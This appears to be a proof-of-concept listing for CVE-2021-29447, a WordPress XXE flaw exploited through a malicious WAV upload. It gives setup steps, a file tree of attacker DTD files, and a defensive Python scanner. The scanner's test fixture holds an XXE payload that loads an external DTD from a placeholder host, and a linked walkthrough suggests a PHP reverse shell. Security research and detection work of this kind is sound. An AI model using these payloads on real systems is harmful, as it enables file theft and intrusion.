POC details: 5479775ce5065d1b37f210b914e31d1ca942103e

Source
Related vulnerability
Title: WordPress code issue vulnerability (CVE-2021-29447)
Description: WordPress is a blogging platform developed in PHP by the WordPress Foundation. It supports hosting personal blog sites on servers running PHP and MySQL. WordPress contains a code issue vulnerability; an attacker who carries out a successful XXE attack can use it to access internal files.
Introduction

# POC CVE-2021-29447 - XXE in WordPress
# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447


## Usage

### Step 1. Run WordPress

```
$ make up-wp
```

### Step 2. Run the attacker web server

```
$ make up-mal
```

### Step 3. Generate the malicious WAV file

#### With the wavefile npm package

```
$ make make-wav
```

### Step 4. Log in to WordPress and upload the WAV file via New Media

```
open http://localhost:8000/
open http://localhost:8000/wp-admin/
```

The exfiltrated file appears in the console and can then be decoded.
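As an added defensive check (this is not code from the POC repository), the following Python walks the RIFF chunks of an uploaded WAV file and flags any non-audio chunk that carries DTD or entity declarations, which is exactly what a WAV-based XXE payload like the one generated in Step 3 depends on; an upload filter or media scanner can reject such files before any metadata parser sees them. The `iXML` chunk name, the sample metadata and the DTD host are constructed for this example.

```python
import struct

# XML keywords are case-sensitive, so a case-sensitive match is exact here
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")

def iter_riff_chunks(data):
    """Yield (chunk_id, payload) for each chunk of a RIFF/WAVE file."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos = 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield cid, data[pos + 8:pos + 8 + size]
        pos += 8 + size + (size & 1)  # RIFF chunks are padded to even length

def scan_wav_for_xxe(data):
    """Return (chunk_id, marker) hits for non-audio chunks carrying DTD syntax."""
    hits = []
    for cid, payload in iter_riff_chunks(data):
        if cid == b"data":  # raw PCM samples, never XML
            continue
        for marker in DTD_MARKERS:
            if marker in payload:
                hits.append((cid.decode("ascii", "replace"), marker.decode()))
    return hits

def build_wav(extra_chunks):
    """Constructed minimal 16-bit mono PCM WAV plus the given (id, payload) chunks."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
    body = b""
    for cid, payload in [(b"fmt ", fmt), (b"data", b"\x00" * 16)] + extra_chunks:
        body += cid + struct.pack("<I", len(payload)) + payload
        body += b"\x00" if len(payload) % 2 else b""
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body

# Constructed iXML chunk payloads: ordinary metadata vs. an external DTD reference.
# The DTD host below is a placeholder, not a real server.
BENIGN_IXML = b'<?xml version="1.0"?><BWFXML><PROJECT>demo</PROJECT></BWFXML>'
SUSPECT_IXML = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % sp SYSTEM '
                b'"http://dtd-host.example.invalid/evil.dtd">%sp;]><r/>')

def demo():
    """Scan one clean and one suspect upload; returns both hit lists."""
    clean = scan_wav_for_xxe(build_wav([(b"iXML", BENIGN_IXML)]))
    suspect = scan_wav_for_xxe(build_wav([(b"iXML", SUSPECT_IXML)]))
    return clean, suspect
```

A scanner like this complements, rather than replaces, the real fix of parsing embedded XML with external entity loading disabled.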

# Online resources


Information on the PHP stream wrappers that can be used in the attacker's DTD file: https://www.php.net/manual/en/wrappers.php.php



### Explanation of the vulnerable code

https://github.com/Abdulazizalsewedy/CVE-2021-29447


### Walkthrough
- https://www.youtube.com/watch?v=tE8Smz1Jvb8
- https://github.com/Slowdeb/Tryhackme/blob/dfbdebe880ddcb5fbfc1f8608812a0e79fd7cf24/Wordpress-CVE-202129447.md?plain=1#L69
    Create a php reverse shell with "msfvenom" or use the awesome php reverse shell from [Pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell). 

### Other resources
- https://www.trendmicro.com/it_it/research/19/d/zero-day-xml-external-entity-xxe-injection-vulnerability-in-internet-explorer-can-let-attackers-steal-files-system-info.html

File snapshot

```
[4.0K] /data/pocs/5479775ce5065d1b37f210b914e31d1ca942103e
├── [4.0K] attacker
│   ├── [ 525] decode.php
│   ├── [4.0K] malicious_wav
│   │   ├── [ 412] index.js
│   │   ├── [  54] package.json
│   │   └── [ 818] package-lock.json
│   └── [4.0K] www
│       ├── [ 193] evil.dtd
│       ├── [ 413] evil_.dtd
│       └── [ 209] evil__.dtd
├── [642K] attack_info.jpeg
├── [ 490] docker-compose.yml
├── [4.0K] examples
│   ├── [ 334] 01.xml
│   └── [ 159] 02.xml
├── [ 833] Makefile
└── [1.3K] README.md

4 directories, 13 files
```